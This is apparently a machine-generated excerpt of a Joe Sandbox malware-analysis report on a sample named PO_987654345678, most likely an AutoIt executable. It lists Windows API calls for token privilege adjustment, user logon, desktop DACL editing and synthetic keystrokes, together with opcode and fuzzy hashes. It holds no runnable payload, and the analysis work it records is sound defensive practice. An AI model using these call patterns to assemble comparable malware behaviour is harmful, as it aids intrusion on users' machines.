                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: fb3370c1c331eed00c780ced1416ed6d26c373c231bc889d404c77872f779d77
                          • Instruction ID: f8f204eedbe8758cce93c3435b677d70bd5632e25cdf69e7d86a49887a7507a4
                          • Opcode Fuzzy Hash: fb3370c1c331eed00c780ced1416ed6d26c373c231bc889d404c77872f779d77
                          • Instruction Fuzzy Hash: 2DE0E533901234A6E6216BB7AC00B9A3749AF427B0F060021BC04964A1CB60ED01B1E4
                          APIs
                          • FreeLibrary.KERNEL32(?,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04F6D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 64873064efdc25546d24b542866bc0416ac09632d0091d771597516fa98fe036
                          • Instruction ID: 391d9daeb7376a7269e98a7ef303251c94b59bf5325fbbd2afb7a9354f95bdcc
                          • Opcode Fuzzy Hash: 64873064efdc25546d24b542866bc0416ac09632d0091d771597516fa98fe036
                          • Instruction Fuzzy Hash: F2F030B1505752CFDB349F64E490922BBE4EF1432A320897EE3EA83551C731A884FF50
                          APIs
                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F02DC4
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LongNamePath_wcslen
                          • String ID:
                          • API String ID: 541455249-0
                          • Opcode ID: 9e2baa3613a4332f9d03452271933e968c9bb0a39dfe3ce50ec681c76c0043dd
                          • Instruction ID: ae9ecc4672b2833e4bb667d382baab55c613cb11d391f3f87a334f7a00a65c6c
                          • Opcode Fuzzy Hash: 9e2baa3613a4332f9d03452271933e968c9bb0a39dfe3ce50ec681c76c0043dd
                          • Instruction Fuzzy Hash: 9EE0CDB26001245BCB10D7589C05FDA77DDDFC8790F050071FD09D7249D964AD849590
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID:
                          • API String ID: 2638373210-0
                          • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                          • Instruction ID: dee9a52243e39354053310b287ebb7671c772e06b88fe2b90211bc791fc5c863
                          • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                          • Instruction Fuzzy Hash: 0BE04FB0609B005FDF3D5A28AC51BF677E89F49310F10486FF69F82252E57278459A4E
                          APIs
                            • Part of subcall function 00F03837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F03908
                            • Part of subcall function 00F0D730: GetInputState.USER32 ref: 00F0D807
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F02B6B
                            • Part of subcall function 00F030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F0314E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconNotifyShell_$CurrentDirectoryInputState
                          • String ID:
                          • API String ID: 3667716007-0
                          • Opcode ID: d6b07a427d7bac02985ab0e111c0272ac9bf8379563a45f33656a2d961fbaecf
                          • Instruction ID: 1f9028282284aca1b8e2c6629e89cf50f77273bc4a049367e093846727db847e
                          • Opcode Fuzzy Hash: d6b07a427d7bac02985ab0e111c0272ac9bf8379563a45f33656a2d961fbaecf
                          • Instruction Fuzzy Hash: 5AE0262230420817CA04BB709C1257DB38E9BD2311F40053FF142432E3CE2845457251
                          APIs
                          • CreateFileW.KERNELBASE(00000000,00000000,?,00F40704,?,?,00000000,?,00F40704,00000000,0000000C), ref: 00F403B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: d6e0d1df67a0f0d29fd4fe84a08ef1f95bef8b5a7321c940fb350079a9ff4ed2
                          • Instruction ID: cfa66de11697a48cf119d74e430176aa7f7224a3605cf660946f2673fa43dc4f
                          • Opcode Fuzzy Hash: d6e0d1df67a0f0d29fd4fe84a08ef1f95bef8b5a7321c940fb350079a9ff4ed2
                          • Instruction Fuzzy Hash: 9FD06C3204010DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E861AB94
                          APIs
                          • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00F01CBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: InfoParametersSystem
                          • String ID:
                          • API String ID: 3098949447-0
                          • Opcode ID: 3e83df5e947cd365a77f18197b2343d8f6924ee8334416e1360a6f22cae14ce4
                          • Instruction ID: 87c4b0c119e1e5ba273ee0de9b9a297019f10c677bf0d75a3df9c5c6ce53be8b
                          • Opcode Fuzzy Hash: 3e83df5e947cd365a77f18197b2343d8f6924ee8334416e1360a6f22cae14ce4
                          • Instruction Fuzzy Hash: 91C0923628130CAFF2158BA4BC4AF107766B358B00F488003F609A95E3C7A22820FA90
                          APIs
                          • GetTempPathW.KERNELBASE(00000104,?), ref: 00F5D8E9
                            • Part of subcall function 00F033A7: _wcslen.LIBCMT ref: 00F033AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: PathTemp_wcslen
                          • String ID:
                          • API String ID: 1974555822-0
                          • Opcode ID: 44d7f632748ef5959209a15bd06a788b428cc1c6f33d209f90f0f5375b493259
                          • Instruction ID: e4a15a91b835e50e57674250caa8068a3ee5c7489cb1f182dfe7a50b9a9b37a1
                          • Opcode Fuzzy Hash: 44d7f632748ef5959209a15bd06a788b428cc1c6f33d209f90f0f5375b493259
                          • Instruction Fuzzy Hash: BBC09B7550101E9FDB909790CCC9BBCB338FF00305F1040D5F60551090DE705A88BF11
                          APIs
                            • Part of subcall function 00F05745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F0949C,?,00008000), ref: 00F05773
                          • GetLastError.KERNEL32(00000002,00000000), ref: 00F776DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateErrorFileLast
                          • String ID:
                          • API String ID: 1214770103-0
                          • Opcode ID: d6ca5f364585c2ec9b95dc6a122d7bfecb1a3f5bc6e2a52603c9b066234d17c8
                          • Instruction ID: d41847138f9ceaa9c052addc33e849c68c89151f3509aa5e057b9be205284e04
                          • Opcode Fuzzy Hash: d6ca5f364585c2ec9b95dc6a122d7bfecb1a3f5bc6e2a52603c9b066234d17c8
                          • Instruction Fuzzy Hash: E88181306087019FCB14EF28C891B6AB7E1AF89354F08855DF8895B3D2DB74ED45EB92
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: b1019eed9a786f379d452cb63394c80b92358448849418b5b90efecf71b0f3dd
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: 41310675A00109DBC718DF59E480AA9F7A1FF89310B6486A5E80ACF655D731EEC5EBC0
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 00EB22B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                          • Instruction ID: b4ca8367f1ae96c45cd35438c243060a73983cd01654162b888ca0d370b9de4a
                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                          • Instruction Fuzzy Hash: 6CE0BF7494010EEFDB00EFA4D5496DE7BB4EF04311F1006A5FD05E7690DB309E548A62
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 00EB22B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction ID: ada8c2feeba3b8d484f687128010c1f6a534518d3465b5e5cce30b031dab9cc5
                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction Fuzzy Hash: D8E0E67494010EDFDB00EFB4D5496DE7FB4EF04301F100265FD01E2280D6309D508A72
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F9961A
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F9965B
                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F9969F
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F996C9
                          • SendMessageW.USER32 ref: 00F996F2
                          • GetKeyState.USER32(00000011), ref: 00F9978B
                          • GetKeyState.USER32(00000009), ref: 00F99798
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F997AE
                          • GetKeyState.USER32(00000010), ref: 00F997B8
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F997E9
                          • SendMessageW.USER32 ref: 00F99810
                          • SendMessageW.USER32(?,00001030,?,00F97E95), ref: 00F99918
                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F9992E
                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F99941
                          • SetCapture.USER32(?), ref: 00F9994A
                          • ClientToScreen.USER32(?,?), ref: 00F999AF
                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F999BC
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F999D6
                          • ReleaseCapture.USER32 ref: 00F999E1
                          • GetCursorPos.USER32(?), ref: 00F99A19
                          • ScreenToClient.USER32(?,?), ref: 00F99A26
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F99A80
                          • SendMessageW.USER32 ref: 00F99AAE
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F99AEB
                          • SendMessageW.USER32 ref: 00F99B1A
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F99B3B
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F99B4A
                          • GetCursorPos.USER32(?), ref: 00F99B68
                          • ScreenToClient.USER32(?,?), ref: 00F99B75
                          • GetParent.USER32(?), ref: 00F99B93
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F99BFA
                          • SendMessageW.USER32 ref: 00F99C2B
                          • ClientToScreen.USER32(?,?), ref: 00F99C84
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F99CB4
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F99CDE
                          • SendMessageW.USER32 ref: 00F99D01
                          • ClientToScreen.USER32(?,?), ref: 00F99D4E
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F99D82
                            • Part of subcall function 00F19944: GetWindowLongW.USER32(?,000000EB), ref: 00F19952
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F99E05
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 3429851547-4164748364
                          • Opcode ID: d5fc7b6cefcb34a95b481a4fb2df505aa653b8e95692bfb394a26eeb1026fc90
                          • Instruction ID: c76da07387a4150a7ee82d50b67af62583a0e5188bb6a216edfd3c30e7dac40a
                          • Opcode Fuzzy Hash: d5fc7b6cefcb34a95b481a4fb2df505aa653b8e95692bfb394a26eeb1026fc90
                          • Instruction Fuzzy Hash: E6429131508205AFEB24CF68CC44BAABBE5FF49320F15061EF659872A1D7B1D850EF92
                          APIs
                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00F948F3
                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00F94908
                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00F94927
                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00F9494B
                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00F9495C
                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00F9497B
                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00F949AE
                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00F949D4
                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00F94A0F
                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00F94A56
                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00F94A7E
                          • IsMenu.USER32(?), ref: 00F94A97
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F94AF2
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F94B20
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F94B94
                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00F94BE3
                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00F94C82
                          • wsprintfW.USER32 ref: 00F94CAE
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F94CC9
                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00F94CF1
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F94D13
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F94D33
                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00F94D5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                          • String ID: %d/%02d/%02d
                          • API String ID: 4054740463-328681919
                          • Opcode ID: f5c7bcb323275853f04946aa79f347266fb462df79036c92afbbd3dfcaeb3a83
                          • Instruction ID: 65f0c8931e8ec1f912d58ea652763c35d31445e46d0742dbbf8b8609f934d6db
                          • Opcode Fuzzy Hash: f5c7bcb323275853f04946aa79f347266fb462df79036c92afbbd3dfcaeb3a83
                          • Instruction Fuzzy Hash: 4912E032A00219ABFF248F24CC49FAE7BF8AF55724F14411AF519DB2E1D774A942EB50
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F1F998
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5F474
                          • IsIconic.USER32(00000000), ref: 00F5F47D
                          • ShowWindow.USER32(00000000,00000009), ref: 00F5F48A
                          • SetForegroundWindow.USER32(00000000), ref: 00F5F494
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F4AA
                          • GetCurrentThreadId.KERNEL32 ref: 00F5F4B1
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F4BD
                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F4CE
                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F4D6
                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F5F4DE
                          • SetForegroundWindow.USER32(00000000), ref: 00F5F4E1
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F4F6
                          • keybd_event.USER32(00000012,00000000), ref: 00F5F501
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F50B
                          • keybd_event.USER32(00000012,00000000), ref: 00F5F510
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F519
                          • keybd_event.USER32(00000012,00000000), ref: 00F5F51E
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F528
                          • keybd_event.USER32(00000012,00000000), ref: 00F5F52D
                          • SetForegroundWindow.USER32(00000000), ref: 00F5F530
                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F5F557
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                           • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          APIs
                            • Part of subcall function 00F616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6170D
                            • Part of subcall function 00F616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F6173A
                            • Part of subcall function 00F616C3: GetLastError.KERNEL32 ref: 00F6174A
                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F61286
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F612A8
                          • CloseHandle.KERNEL32(?), ref: 00F612B9
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F612D1
                          • GetProcessWindowStation.USER32 ref: 00F612EA
                          • SetProcessWindowStation.USER32(00000000), ref: 00F612F4
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F61310
                            • Part of subcall function 00F610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F611FC), ref: 00F610D4
                            • Part of subcall function 00F610BF: CloseHandle.KERNEL32(?,?,00F611FC), ref: 00F610E9
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                          • String ID: $default$winsta0
                          • API String ID: 22674027-1027155976
                          APIs
                            • Part of subcall function 00F610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61114
                            • Part of subcall function 00F610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61120
                            • Part of subcall function 00F610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F6112F
                            • Part of subcall function 00F610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F60B9B,?,?,?), ref: 00F61136
                            • Part of subcall function 00F610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F6114D
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F60BCC
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F60C00
                          • GetLengthSid.ADVAPI32(?), ref: 00F60C17
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00F60C51
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F60C6D
                          • GetLengthSid.ADVAPI32(?), ref: 00F60C84
                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F60C8C
                          • HeapAlloc.KERNEL32(00000000), ref: 00F60C93
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F60CB4
                          • CopySid.ADVAPI32(00000000), ref: 00F60CBB
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F60CEA
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F60D0C
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F60D1E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60D45
                          • HeapFree.KERNEL32(00000000), ref: 00F60D4C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60D55
                          • HeapFree.KERNEL32(00000000), ref: 00F60D5C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F60D65
                          • HeapFree.KERNEL32(00000000), ref: 00F60D6C
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00F60D78
                          • HeapFree.KERNEL32(00000000), ref: 00F60D7F
                            • Part of subcall function 00F61193: GetProcessHeap.KERNEL32(00000008,00F60BB1,?,00000000,?,00F60BB1,?), ref: 00F611A1
